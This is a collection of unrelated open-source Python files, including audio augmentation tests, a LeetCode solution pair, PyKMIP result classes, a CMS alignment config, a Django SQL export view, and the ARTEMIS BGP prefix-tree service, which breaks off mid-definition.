y_rad = config["frame_y_radius"]
buff = DEFAULT_MOBJECT_TO_MOBJECT_BUFFER
self._bounds.ul = np.array((x_rad * -1 + buff, y_rad - buff, 0))
self._bounds.ur = np.array((x_rad - buff, y_rad - buff, 0))
self._bounds.dr = np.array((x_rad - buff, y_rad * -1 + buff, 0))
self._bounds.dl = np.array((x_rad * -1 + buff, y_rad * -1 + buff, 0))
return self
def to_edge(self, edge=LEFT, buff=DEFAULT_MOBJECT_TO_EDGE_BUFFER):
self.__wrapped__.to_edge(edge, buff)
self._update_bounds_to_direction(edge)
self.autoscale(edge)
return self
def autoscale(self, direction: np.array):
"""
Manually autoscales in a given direction
Args:
direction: The direction to scale in
"""
if not self.__wrapped__.get_width() or not self.__wrapped__.get_height():
return
x_scale = self._bounds.width / self.__wrapped__.get_width()
y_scale = self._bounds.height / self.__wrapped__.get_height()
self.scale(min(x_scale, y_scale), about_point=self._bounds.as_mobject().get_critical_point(direction))
def _update_bounds_to_direction(self, direction: np.array):
if direction[0] == -1:
new_x = self.__wrapped__.get_x(LEFT)
self._bounds.ul = np.array((new_x, self._bounds.ul[1], self._bounds.ul[2]))
self._bounds.dl = np.array((new_x, self._bounds.dl[1], self._bounds.dl[2]))
elif direction[0] == 1:
new_x = self.__wrapped__.get_x(RIGHT)
self._bounds.ur = np.array((new_x, self._bounds.ur[1], self._bounds.ur[2]))
self._bounds.dr = np.array((new_x, self._bounds.dr[1], self._bounds.dr[2]))
if direction[1] == -1:
new_y = self.__wrapped__.get_y(DOWN)
self._bounds.dr = np.array((self._bounds.dr[0], new_y, self._bounds.dr[2]))
self._bounds.dl = np.array((self._bounds.dl[0], new_y, self._bounds.dl[2]))
elif direction[1] == 1:
new_y = self.__wrapped__.get_y(UP)
self._bounds.ur = np.array((self._bounds.ur[0], new_y, self._bounds.ur[2]))
self._bounds.ul = np.array((self._bounds.ul[0], new_y, self._bounds.ul[2]))
|
tests/test_mp3_compression.py
|
jeongyoonlee/audiomentations
| 930 |
78612
|
import unittest
import numpy as np
from audiomentations.augmentations.transforms import Mp3Compression
from audiomentations.core.composition import Compose
class TestMp3Compression(unittest.TestCase):
def test_apply_mp3_compression_pydub(self):
sample_len = 44100
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 44100
augmenter = Compose(
[Mp3Compression(p=1.0, min_bitrate=48, max_bitrate=48, backend="pydub")]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertGreaterEqual(len(samples_out), sample_len)
self.assertLess(len(samples_out), sample_len + 2500)
def test_apply_mp3_compression_lameenc(self):
sample_len = 44100
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 44100
augmenter = Compose(
[Mp3Compression(p=1.0, min_bitrate=48, max_bitrate=48, backend="lameenc")]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertGreaterEqual(len(samples_out), sample_len)
self.assertLess(len(samples_out), sample_len + 2500)
def test_apply_mp3_compression_low_bitrate_pydub(self):
sample_len = 16000
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose(
[Mp3Compression(p=1.0, min_bitrate=8, max_bitrate=8, backend="pydub")]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertGreaterEqual(len(samples_out), sample_len)
self.assertLess(len(samples_out), sample_len + 2500)
def test_apply_mp3_compression_low_bitrate_lameenc(self):
sample_len = 16000
samples_in = np.random.normal(0, 1, size=sample_len).astype(np.float32)
sample_rate = 16000
augmenter = Compose(
[Mp3Compression(p=1.0, min_bitrate=8, max_bitrate=8, backend="lameenc")]
)
samples_out = augmenter(samples=samples_in, sample_rate=sample_rate)
self.assertEqual(samples_out.dtype, np.float32)
self.assertGreaterEqual(len(samples_out), sample_len)
self.assertLess(len(samples_out), sample_len + 2500)
def test_invalid_argument_combination(self):
with self.assertRaises(AssertionError):
_ = Mp3Compression(min_bitrate=400, max_bitrate=800)
with self.assertRaises(AssertionError):
_ = Mp3Compression(min_bitrate=2, max_bitrate=4)
with self.assertRaises(AssertionError):
_ = Mp3Compression(min_bitrate=64, max_bitrate=8)
|
dbaas/drivers/mysqlpercona.py
|
didindinn/database-as-a-service
| 303 |
78614
|
from . import mysqldb
from physical.models import Instance
class MySQLPercona(mysqldb.MySQL):
def get_default_instance_type(self):
return Instance.MYSQL_PERCONA
@classmethod
def topology_name(cls):
return ['mysql_percona_single']
class MySQLPerconaFOXHA(mysqldb.MySQLFOXHA):
def get_default_instance_type(self):
return Instance.MYSQL_PERCONA
@classmethod
def topology_name(cls):
return ['mysql_percona_foxha']
|
Python3/982.py
|
rakhi2001/ecom7
| 854 |
78659
|
<reponame>rakhi2001/ecom7
__________________________________________________________________________________________________
sample 476 ms submission
class Solution:
def countTriplets(self, A: List[int]) -> int:
n=len(A)
tmp=[bin(a)[2:].zfill(16) for a in A]
one={}
for i,a in enumerate(zip(*tmp)):
one[i]=set([i for i,v in enumerate(list(a)) if v=='1'])
Venn = collections.defaultdict(list)
cnt = 0
for j in range(len(one)):
if len(one[j]) != 0:
cnt += (len(one[j]))**3
for i in range(j, 0, -1):
for prv in Venn[i]:
intersec = prv & one[j]
if len(intersec) != 0:
cnt += ((-1)**i)*(len(intersec))**3
Venn[i+1].append(intersec)
Venn[1].append(one[j])
return n**3 - cnt
__________________________________________________________________________________________________
sample 16336 kb submission
class Solution:
def countTriplets(self, A: 'List[int]') -> 'int':
counts = {}
for a1 in A:
for a2 in A:
x = a1 & a2
if x in counts:
counts[x] += 1
else:
counts[x] = 1
tot = 0
for key in counts:
for a in A:
if a & key == 0:
tot += counts[key]
return tot
__________________________________________________________________________________________________
|
kmip/services/results.py
|
ondrap/PyKMIP
| 179 |
78665
|
# Copyright (c) 2014 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class OperationResult(object):
def __init__(self,
result_status,
result_reason=None,
result_message=None):
self.result_status = result_status
if result_reason is not None:
self.result_reason = result_reason
else:
self.result_reason = None
if result_message is not None:
self.result_message = result_message
else:
self.result_message = None
class CreateResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
object_type=None,
uuid=None,
template_attribute=None):
super(CreateResult, self).__init__(
result_status, result_reason, result_message)
if object_type is not None:
self.object_type = object_type
else:
self.object_type = None
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
if template_attribute is not None:
self.template_attribute = template_attribute
else:
self.template_attribute = None
class CreateKeyPairResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
private_key_uuid=None,
public_key_uuid=None,
private_key_template_attribute=None,
public_key_template_attribute=None):
super(CreateKeyPairResult, self).__init__(
result_status, result_reason, result_message)
self.private_key_uuid = private_key_uuid
self.public_key_uuid = public_key_uuid
self.private_key_template_attribute = private_key_template_attribute
self.public_key_template_attribute = public_key_template_attribute
class ActivateResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuid=None):
super(ActivateResult, self).__init__(
result_status, result_reason, result_message)
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
class RegisterResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuid=None,
template_attribute=None):
super(RegisterResult, self).__init__(
result_status, result_reason, result_message)
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
if template_attribute is not None:
self.template_attribute = template_attribute
else:
self.template_attribute = None
class RekeyKeyPairResult(CreateKeyPairResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
private_key_uuid=None,
public_key_uuid=None,
private_key_template_attribute=None,
public_key_template_attribute=None):
super(RekeyKeyPairResult, self).__init__(
result_status, result_reason, result_message, private_key_uuid,
public_key_uuid, private_key_template_attribute,
public_key_template_attribute)
class GetResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
object_type=None,
uuid=None,
secret=None):
super(GetResult, self).__init__(
result_status, result_reason, result_message)
if object_type is not None:
self.object_type = object_type
else:
self.object_type = None
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
if secret is not None:
self.secret = secret
else:
self.secret = None
class GetAttributesResult(OperationResult):
def __init__(
self,
result_status,
result_reason=None,
result_message=None,
uuid=None,
attributes=None
):
super(GetAttributesResult, self).__init__(
result_status,
result_reason,
result_message
)
self.uuid = uuid
self.attributes = attributes
class GetAttributeListResult(OperationResult):
def __init__(
self,
result_status,
result_reason=None,
result_message=None,
uid=None,
names=None):
super(GetAttributeListResult, self).__init__(
result_status, result_reason, result_message)
self.uid = uid
self.names = names
class DestroyResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuid=None):
super(DestroyResult, self).__init__(
result_status, result_reason, result_message)
if uuid is not None:
self.uuid = uuid
else:
self.uuid = None
class LocateResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuids=None):
super(LocateResult, self).__init__(
result_status, result_reason, result_message)
self.uuids = uuids
class QueryResult(OperationResult):
"""
A container for the results of a Query operation.
Attributes:
result_status: The status of the Query operation (e.g., success or
failure).
result_reason: The reason for the operation status.
result_message: Extra information pertaining to the status reason.
operations: A list of Operations supported by the server.
object_types: A list of Object Types supported by the server.
vendor_identification:
server_information:
application_namespaces: A list of namespaces supported by the server.
extension_information: A list of extensions supported by the server.
"""
def __init__(self,
result_status,
result_reason=None,
result_message=None,
operations=None,
object_types=None,
vendor_identification=None,
server_information=None,
application_namespaces=None,
extension_information=None):
super(QueryResult, self).__init__(
result_status, result_reason, result_message)
if operations is None:
self.operations = list()
else:
self.operations = operations
if object_types is None:
self.object_types = list()
else:
self.object_types = object_types
self.vendor_identification = vendor_identification
self.server_information = server_information
if application_namespaces is None:
self.application_namespaces = list()
else:
self.application_namespaces = application_namespaces
if extension_information is None:
self.extension_information = list()
else:
self.extension_information = extension_information
class DiscoverVersionsResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
protocol_versions=None):
super(DiscoverVersionsResult, self).__init__(
result_status, result_reason, result_message)
self.protocol_versions = protocol_versions
class RevokeResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
unique_identifier=None):
super(RevokeResult, self).__init__(
result_status, result_reason, result_message)
self.unique_identifier = unique_identifier
class MACResult(OperationResult):
def __init__(self,
result_status,
result_reason=None,
result_message=None,
uuid=None,
mac_data=None):
super(MACResult, self).__init__(
result_status,
result_reason,
result_message
)
self.uuid = uuid
self.mac_data = mac_data
|
Alignment/CommonAlignmentProducer/python/ALCARECOTkAlCosmicsInCollisions_cff.py
|
ckamtsikis/cmssw
| 852 |
78687
|
# Author : <NAME>
# Date : July 1st, 2010
# last update: $Date: 2010/03/17 18:17:34 $ by $Author: mussgill $
import FWCore.ParameterSet.Config as cms
#_________________________________HLT bits___________________________________________
import HLTrigger.HLTfilters.hltHighLevel_cfi
ALCARECOTkAlCosmicsInCollisionsHLT = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone(
andOr = True, ## choose logical OR between Triggerbits
eventSetupPathsKey = 'TkAlCosmicsInCollisions',
throw = False # tolerate triggers not available
)
# DCS partitions
# "EBp","EBm","EEp","EEm","HBHEa","HBHEb","HBHEc","HF","HO","RPC"
# "DT0","DTp","DTm","CSCp","CSCm","CASTOR","TIBTID","TOB","TECp","TECm"
# "BPIX","FPIX","ESp","ESm"
import DPGAnalysis.Skims.skim_detstatus_cfi
ALCARECOTkAlCosmicsInCollisionsDCSFilter = DPGAnalysis.Skims.skim_detstatus_cfi.dcsstatus.clone(
DetectorType = cms.vstring('TIBTID','TOB','TECp','TECm','BPIX','FPIX'),
ApplyFilter = cms.bool(True),
AndOr = cms.bool(True),
DebugOn = cms.untracked.bool(False)
)
#_________________________ Cosmic During Collisions__________________________________
from RecoTracker.SpecialSeedGenerators.cosmicDC_cff import *
#________________________________Track selection____________________________________
# AlCaReco for track based alignment using Cosmic muons reconstructed by Cosmics during collisions
import Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi
ALCARECOTkAlCosmicsInCollisions = Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi.AlignmentTrackSelector.clone(
src = 'cosmicDCTracks',
filter = True,
applyBasicCuts = True,
ptMin = 0., ##10
ptMax = 99999.,
pMin = 4., ##10
pMax = 99999.,
etaMin = -99., ##-2.4 keep also what is going through...
etaMax = 99., ## 2.4 ...both TEC with flat slope
nHitMin = 7,
nHitMin2D = 2,
chi2nMax = 999999.,
applyMultiplicityFilter = False,
applyNHighestPt = True, ## select only highest pT track
nHighestPt = 1
)
#________________________________Sequences____________________________________
seqALCARECOTkAlCosmicsInCollisions = cms.Sequence(cosmicDCTracksSeq*ALCARECOTkAlCosmicsInCollisionsHLT+ALCARECOTkAlCosmicsInCollisionsDCSFilter+ALCARECOTkAlCosmicsInCollisions)
|
explorer/views/export.py
|
Patil2099/django-sql-explorer
| 1,729 |
78712
|
# -*- coding: utf-8 -*-
from django.db import DatabaseError
from django.http import HttpResponse
from explorer.exporters import get_exporter_class
from explorer.utils import url_get_params
def _export(request, query, download=True):
_fmt = request.GET.get('format', 'csv')
exporter_class = get_exporter_class(_fmt)
query.params = url_get_params(request)
delim = request.GET.get('delim')
exporter = exporter_class(query)
try:
output = exporter.get_output(delim=delim)
except DatabaseError as e:
msg = f"Error executing query {query.title}: {e}"
return HttpResponse(
msg, status=500
)
response = HttpResponse(
output,
content_type=exporter.content_type
)
if download:
response['Content-Disposition'] = \
f'attachment; filename="{exporter.get_filename()}"'
return response
|
rpython/jit/backend/llgraph/symbolic.py
|
nanjekyejoannah/pypy
| 381 |
78713
|
<reponame>nanjekyejoannah/pypy
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rtyper import rclass
Size2Type = [None] * 100
Type2Size = {}
def get_size(TYPE):
try:
return Type2Size[TYPE]
except KeyError:
size = len(Size2Type)
Size2Type.append(TYPE)
Type2Size[TYPE] = size
return size
TokenToField = [None] * 100
FieldToToken = {}
def get_field_token(STRUCT, fieldname):
try:
return FieldToToken[STRUCT, fieldname]
except KeyError:
token = (len(TokenToField), get_size(getattr(STRUCT, fieldname)))
TokenToField.append((STRUCT, fieldname))
FieldToToken[STRUCT, fieldname] = token
return token
get_field_token(rclass.OBJECT, 'typeptr') # force the index 1 for this
|
backend-services/prefixtree/core/prefixtree.py
|
cytechmobile/artemis
| 237 |
78719
|
<filename>backend-services/prefixtree/core/prefixtree.py
import multiprocessing as mp
from typing import Dict
from typing import List
from typing import NoReturn
import pytricia
import redis
import requests
import ujson as json
from artemis_utils import flatten
from artemis_utils import get_ip_version
from artemis_utils import get_logger
from artemis_utils import search_worst_prefix
from artemis_utils.constants import CONFIGURATION_HOST
from artemis_utils.envvars import RABBITMQ_URI
from artemis_utils.envvars import REDIS_HOST
from artemis_utils.envvars import REDIS_PORT
from artemis_utils.envvars import REST_PORT
from artemis_utils.rabbitmq import create_exchange
from artemis_utils.rabbitmq import create_queue
from artemis_utils.redis import ping_redis
from artemis_utils.translations import translate_asn_range
from artemis_utils.translations import translate_rfc2622
from kombu import Connection
from kombu import Consumer
from kombu import Producer
from kombu import serialization
from kombu import uuid
from kombu.mixins import ConsumerProducerMixin
from tornado.ioloop import IOLoop
from tornado.web import Application
from tornado.web import RequestHandler
# logger
log = get_logger()
# additional serializer for pg-amqp messages
serialization.register(
"txtjson", json.dumps, json.loads, content_type="text", content_encoding="utf-8"
)
# shared memory object locks
shared_memory_locks = {
"data_worker": mp.Lock(),
"prefix_tree": mp.Lock(),
"autoignore": mp.Lock(),
"monitored_prefixes": mp.Lock(),
"configured_prefix_count": mp.Lock(),
"config_timestamp": mp.Lock(),
"service_reconfiguring": mp.Lock(),
}
# global vars
SERVICE_NAME = "prefixtree"
def pytricia_to_dict(pyt_tree):
pyt_dict = {}
for prefix in pyt_tree:
pyt_dict[prefix] = pyt_tree[prefix]
return pyt_dict
def dict_to_pytricia(dict_tree, size=32):
pyt_tree = pytricia.PyTricia(size)
for prefix in dict_tree:
pyt_tree.insert(prefix, dict_tree[prefix])
return pyt_tree
def configure_prefixtree(msg, shared_memory_manager_dict):
config = msg
try:
# check newer config
config_timestamp = shared_memory_manager_dict["config_timestamp"]
if config["timestamp"] > config_timestamp:
shared_memory_locks["service_reconfiguring"].acquire()
shared_memory_manager_dict["service_reconfiguring"] = True
shared_memory_locks["service_reconfiguring"].release()
# calculate prefix tree
prefix_tree = {"v4": pytricia.PyTricia(32), "v6": pytricia.PyTricia(128)}
rules = config.get("rules", [])
for rule in rules:
rule_translated_origin_asn_set = set()
for asn in rule["origin_asns"]:
this_translated_asn_list = flatten(translate_asn_range(asn))
rule_translated_origin_asn_set.update(set(this_translated_asn_list))
rule["origin_asns"] = list(rule_translated_origin_asn_set)
rule_translated_neighbor_set = set()
for asn in rule["neighbors"]:
this_translated_asn_list = flatten(translate_asn_range(asn))
rule_translated_neighbor_set.update(set(this_translated_asn_list))
rule["neighbors"] = list(rule_translated_neighbor_set)
conf_obj = {
"origin_asns": rule["origin_asns"],
"neighbors": rule["neighbors"],
"prepend_seq": rule.get("prepend_seq", []),
"policies": list(set(rule.get("policies", []))),
"community_annotations": rule.get("community_annotations", []),
"mitigation": rule.get("mitigation", "manual"),
}
for prefix in rule["prefixes"]:
for translated_prefix in translate_rfc2622(prefix):
ip_version = get_ip_version(translated_prefix)
if prefix_tree[ip_version].has_key(translated_prefix):
node = prefix_tree[ip_version][translated_prefix]
else:
node = {
"prefix": translated_prefix,
"data": {"confs": []},
"timestamp": config["timestamp"],
}
prefix_tree[ip_version].insert(translated_prefix, node)
node["data"]["confs"].append(conf_obj)
# calculate the monitored and configured prefixes
configured_prefix_count = 0
monitored_prefixes = set()
for ip_version in prefix_tree:
for prefix in prefix_tree[ip_version]:
configured_prefix_count += 1
monitored_prefix = search_worst_prefix(
prefix, prefix_tree[ip_version]
)
if monitored_prefix:
monitored_prefixes.add(monitored_prefix)
# extract autoignore rules
autoignore_rules = config.get("autoignore", {})
# calculate autoignore prefix tree
autoignore_prefix_tree = {
"v4": pytricia.PyTricia(32),
"v6": pytricia.PyTricia(128),
}
for key in autoignore_rules:
rule = autoignore_rules[key]
for prefix in rule["prefixes"]:
for translated_prefix in translate_rfc2622(prefix):
ip_version = get_ip_version(translated_prefix)
if not autoignore_prefix_tree[ip_version].has_key(
translated_prefix
):
node = {"prefix": translated_prefix, "rule_key": key}
autoignore_prefix_tree[ip_version].insert(
translated_prefix, node
)
# note that the object should be picklable (e.g., dict instead of pytricia tree,
# see also: https://github.com/jsommers/pytricia/issues/20)
shared_memory_locks["prefix_tree"].acquire()
dict_prefix_tree = {
"v4": pytricia_to_dict(prefix_tree["v4"]),
"v6": pytricia_to_dict(prefix_tree["v6"]),
}
shared_memory_manager_dict["prefix_tree"] = dict_prefix_tree
shared_memory_manager_dict["prefix_tree_recalculate"] = True
shared_memory_locks["prefix_tree"].release()
shared_memory_locks["monitored_prefixes"].acquire()
shared_memory_manager_dict["monitored_prefixes"] = list(monitored_prefixes)
shared_memory_locks["monitored_prefixes"].release()
shared_memory_locks["configured_prefix_count"].acquire()
shared_memory_manager_dict[
"configured_prefix_count"
] = configured_prefix_count
shared_memory_locks["configured_prefix_count"].release()
# note that the object should be picklable (e.g., dict instead of pytricia tree,
# see also: https://github.com/jsommers/pytricia/issues/20)
dict_autoignore_prefix_tree = {
"v4": pytricia_to_dict(autoignore_prefix_tree["v4"]),
"v6": pytricia_to_dict(autoignore_prefix_tree["v6"]),
}
shared_memory_locks["autoignore"].acquire()
shared_memory_manager_dict["autoignore_rules"] = autoignore_rules
shared_memory_manager_dict[
"autoignore_prefix_tree"
] = dict_autoignore_prefix_tree
shared_memory_manager_dict["autoignore_recalculate"] = True
shared_memory_locks["autoignore"].release()
shared_memory_locks["config_timestamp"].acquire()
shared_memory_manager_dict["config_timestamp"] = config["timestamp"]
shared_memory_locks["config_timestamp"].release()
shared_memory_locks["service_reconfiguring"].acquire()
shared_memory_manager_dict["service_reconfiguring"] = False
shared_memory_locks["service_reconfiguring"].release()
return {"success": True, "message": "configured"}
except Exception:
log.exception("exception")
shared_memory_locks["service_reconfiguring"].acquire()
shared_memory_manager_dict["service_reconfiguring"] = False
shared_memory_locks["service_reconfiguring"].release()
return {"success": False, "message": "error during service configuration"}
class ConfigHandler(RequestHandler):
"""
REST request handler for configuration.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Provides current configuration primitives (in the form of a JSON dict) to the requester.
Format:
{
"prefix_tree": {
"v4": <dict>,
"v6": <dict>
},
"prefix_tree_recalculate": <bool>,
"monitored_prefixes": <list>,
"configured_prefix_count": <int>,
"autoignore_rules": <dict>,
"autoignore_prefix_tree": {
"v4": <dict>,
"v6": <dict>
},
"autoignore_recalculate": <bool>,
"config_timestamp": <timestamp>
}
"""
ret_dict = {}
ret_dict["prefix_tree"] = self.shared_memory_manager_dict["prefix_tree"]
ret_dict["prefix_tree_recalculate"] = self.shared_memory_manager_dict[
"prefix_tree_recalculate"
]
ret_dict["monitored_prefixes"] = self.shared_memory_manager_dict[
"monitored_prefixes"
]
ret_dict["configured_prefix_count"] = self.shared_memory_manager_dict[
"configured_prefix_count"
]
ret_dict["autoignore_rules"] = self.shared_memory_manager_dict[
"autoignore_rules"
]
ret_dict["autoignore_prefix_tree"] = self.shared_memory_manager_dict[
"autoignore_prefix_tree"
]
ret_dict["autoignore_recalculate"] = self.shared_memory_manager_dict[
"autoignore_recalculate"
]
ret_dict["config_timestamp"] = self.shared_memory_manager_dict[
"config_timestamp"
]
self.write(ret_dict)
def post(self):
"""
Configures prefix tree and responds with a success message.
:return: {"success": True | False, "message": < message >}
"""
try:
msg = json.loads(self.request.body)
self.write(configure_prefixtree(msg, self.shared_memory_manager_dict))
except Exception:
self.write(
{"success": False, "message": "error during service configuration"}
)
class HealthHandler(RequestHandler):
"""
REST request handler for health checks.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Extract the status of a service via a GET request.
:return: {"status" : <unconfigured|running|stopped><,reconfiguring>}
"""
status = "stopped"
shared_memory_locks["data_worker"].acquire()
if self.shared_memory_manager_dict["data_worker_running"]:
status = "running"
shared_memory_locks["data_worker"].release()
if self.shared_memory_manager_dict["service_reconfiguring"]:
status += ",reconfiguring"
self.write({"status": status})
class ControlHandler(RequestHandler):
"""
REST request handler for control commands.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def start_data_worker(self):
shared_memory_locks["data_worker"].acquire()
if self.shared_memory_manager_dict["data_worker_running"]:
log.info("data worker already running")
shared_memory_locks["data_worker"].release()
return "already running"
shared_memory_locks["data_worker"].release()
mp.Process(target=self.run_data_worker_process).start()
return "instructed to start"
def run_data_worker_process(self):
try:
with Connection(RABBITMQ_URI) as connection:
shared_memory_locks["data_worker"].acquire()
data_worker = PrefixTreeDataWorker(
connection, self.shared_memory_manager_dict
)
self.shared_memory_manager_dict["data_worker_running"] = True
shared_memory_locks["data_worker"].release()
log.info("data worker started")
data_worker.run()
except Exception:
log.exception("exception")
finally:
shared_memory_locks["data_worker"].acquire()
self.shared_memory_manager_dict["data_worker_running"] = False
shared_memory_locks["data_worker"].release()
log.info("data worker stopped")
@staticmethod
def stop_data_worker():
shared_memory_locks["data_worker"].acquire()
try:
with Connection(RABBITMQ_URI) as connection:
with Producer(connection) as producer:
command_exchange = create_exchange("command", connection)
producer.publish(
"",
exchange=command_exchange,
routing_key="stop-{}".format(SERVICE_NAME),
serializer="ujson",
)
except Exception:
log.exception("exception")
finally:
shared_memory_locks["data_worker"].release()
message = "instructed to stop"
return message
def post(self):
"""
Instruct a service to start or stop by posting a command.
Sample request body
{
"command": <start|stop>
}
:return: {"success": True|False, "message": <message>}
"""
try:
msg = json.loads(self.request.body)
command = msg["command"]
# start/stop data_worker
if command == "start":
message = self.start_data_worker()
self.write({"success": True, "message": message})
elif command == "stop":
message = self.stop_data_worker()
self.write({"success": True, "message": message})
else:
self.write({"success": False, "message": "unknown command"})
except Exception:
log.exception("Exception")
self.write({"success": False, "message": "error during control"})
class ConfiguredPrefixCountHandler(RequestHandler):
"""
REST request handler for configured prefix count information.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Simply provides the configured prefix count (in the form of a JSON dict) to the requester
"""
self.write(
{
"configured_prefix_count": self.shared_memory_manager_dict[
"configured_prefix_count"
]
}
)
class MonitoredPrefixesHandler(RequestHandler):
"""
REST request handler for monitored prefixes information.
"""
def initialize(self, shared_memory_manager_dict):
self.shared_memory_manager_dict = shared_memory_manager_dict
def get(self):
"""
Simply provides the monitored prefixes (in the form of a JSON dict) to the requester
"""
self.write(
{
"monitored_prefixes": self.shared_memory_manager_dict[
"monitored_prefixes"
]
}
)
class PrefixTree:
"""
Prefix Tree Service.
"""
def __init__(self):
# initialize shared memory
shared_memory_manager = mp.Manager()
self.shared_memory_manager_dict = shared_memory_manager.dict()
self.shared_memory_manager_dict["data_worker_running"] = False
self.shared_memory_manager_dict["service_reconfiguring"] = False
self.shared_memory_manager_dict["prefix_tree"] = {"v4": {}, "v6": {}}
self.shared_memory_manager_dict["prefix_tree_recalculate"] = True
self.shared_memory_manager_dict["monitored_prefixes"] = list()
self.shared_memory_manager_dict["configured_prefix_count"] = 0
self.shared_memory_manager_dict["autoignore_rules"] = {}
self.shared_memory_manager_dict["autoignore_prefix_tree"] = {"v4": {}, "v6": {}}
self.shared_memory_manager_dict["autoignore_recalculate"] = True
self.shared_memory_manager_dict["config_timestamp"] = -1
log.info("service initiated")
def make_rest_app(self):
return Application(
[
(
"/config",
ConfigHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/control",
ControlHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/health",
HealthHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/configuredPrefixCount",
ConfiguredPrefixCountHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
(
"/monitoredPrefixes",
MonitoredPrefixesHandler,
dict(shared_memory_manager_dict=self.shared_memory_manager_dict),
),
]
)
def start_rest_app(self):
app = self.make_rest_app()
app.listen(REST_PORT)
log.info("REST worker started and listening to port {}".format(REST_PORT))
IOLoop.current().start()
class PrefixTreeDataWorker(ConsumerProducerMixin):
"""
RabbitMQ Consumer/Producer for the prefix tree Service.
"""
def __init__(
self, connection: Connection, shared_memory_manager_dict: Dict
) -> NoReturn:
self.connection = connection
self.redis = redis.Redis(host=REDIS_HOST, port=REDIS_PORT)
ping_redis(self.redis)
self.shared_memory_manager_dict = shared_memory_manager_dict
self.prefix_tree = {"v4": pytricia.PyTricia(32), "v6": pytricia.PyTricia(128)}
shared_memory_locks["prefix_tree"].acquire()
if self.shared_memory_manager_dict["prefix_tree_recalculate"]:
for ip_version in ["v4", "v6"]:
if ip_version == "v4":
size = 32
else:
size = 128
self.prefix_tree[ip_version] = dict_to_pytricia(
self.shared_memory_manager_dict["prefix_tree"][ip_version], size
)
log.info(
"{} pytricia tree parsed from configuration".format(ip_version)
)
self.shared_memory_manager_dict["prefix_tree_recalculate"] = False
shared_memory_locks["prefix_tree"].release()
self.autoignore_prefix_tree = {
"v4": pytricia.PyTricia(32),
"v6": pytricia.PyTricia(128),
}
shared_memory_locks["autoignore"].acquire()
if self.shared_memory_manager_dict["autoignore_recalculate"]:
for ip_version in ["v4", "v6"]:
if ip_version == "v4":
size = 32
else:
size = 128
self.autoignore_prefix_tree[ip_version] = dict_to_pytricia(
self.shared_memory_manager_dict["autoignore_prefix_tree"][
ip_version
],
size,
)
log.info(
"{} pytricia tree parsed from configuration".format(ip_version)
)
self.shared_memory_manager_dict["autoignore_recalculate"] = False
shared_memory_locks["autoignore"].release()
# EXCHANGES
self.update_exchange = create_exchange("bgp-update", connection, declare=True)
self.hijack_exchange = create_exchange(
"hijack-update", connection, declare=True
)
self.autoconf_exchange = create_exchange("autoconf", connection, declare=True)
self.pg_amq_bridge = create_exchange("amq.direct", connection)
self.mitigation_exchange = create_exchange(
"mitigation", connection, declare=True
)
self.autoignore_exchange = create_exchange(
"autoignore", connection, declare=True
)
self.command_exchange = create_exchange("command", connection, declare=True)
# QUEUES
self.update_queue = create_queue(
SERVICE_NAME,
exchange=self.update_exchange,
routing_key="update",
priority=1,
)
self.hijack_ongoing_queue = create_queue(
SERVICE_NAME,
exchange=self.hijack_exchange,
routing_key="ongoing",
priority=1,
)
self.pg_amq_update_queue = create_queue(
SERVICE_NAME,
exchange=self.pg_amq_bridge,
routing_key="update-insert",
priority=1,
)
self.mitigation_request_queue = create_queue(
SERVICE_NAME,
exchange=self.mitigation_exchange,
routing_key="mitigate",
priority=2,
)
self.unmitigation_request_queue = create_queue(
SERVICE_NAME,
exchange=self.mitigation_exchange,
routing_key="unmitigate",
priority=2,
)
self.stop_queue = create_queue(
"{}-{}".format(SERVICE_NAME, uuid()),
exchange=self.command_exchange,
routing_key="stop-{}".format(SERVICE_NAME),
priority=1,
)
self.autoconf_update_queue = create_queue(
SERVICE_NAME,
